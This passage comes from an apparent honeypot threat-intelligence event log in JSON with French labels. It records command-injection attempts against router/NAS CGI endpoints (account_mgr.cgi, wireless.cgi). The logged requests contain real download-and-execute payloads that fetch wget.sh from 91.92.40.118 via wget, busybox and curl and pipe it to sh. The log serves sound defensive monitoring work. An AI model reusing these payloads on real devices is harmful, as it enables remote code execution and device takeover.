fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022a54c28e76b3b5cc42ac12b2dc1912495\u0022, \u0022path_pattern_hash\u0022: \u0022d878a82020fc023d6ee51e23ab301813\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022query_string\u0022: \u0022cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022query_string\u0022: \u0022cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HT\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022ba7f3ecc5ec566ee296bddcb01f60f9191c92f38\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":306},{"id":11809380,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54746,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/wireless.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00225d213d21ab531035b3d11e0f269406faf9a8e9dd\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 320, \u0022payload_entropy\u0022: 5.164308067148083, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c646f31985be564f8ea585a35c4a8c6b8894c061\u0022, \u0022event_fingerprint\u0022: \u00221c981364e647bf50b91a43eb1fa770d2028835ab\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022d7f70269f11fa7cb8202b69786f449f7\u0022, \u0022path_pattern_hash\u0022: \u0022e8069dc607bc4e1a464a8f30c4269ee3\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\\r\\n\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\\r\\nConnection: close\\r\\n\\r\\nsz11gChannel=1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr1;busybox wget http:\/\/91.92.40.118\/wge\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\\r\\nConnection: close\\r\\n\\r\\nsz11gChannel=1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr1;busybox wget http:\/\/91.92.40.118\/wge\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00229594e7257af8d9a2ea471b1b525ed7400c81c3d2\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/wireless.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/wireless.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: 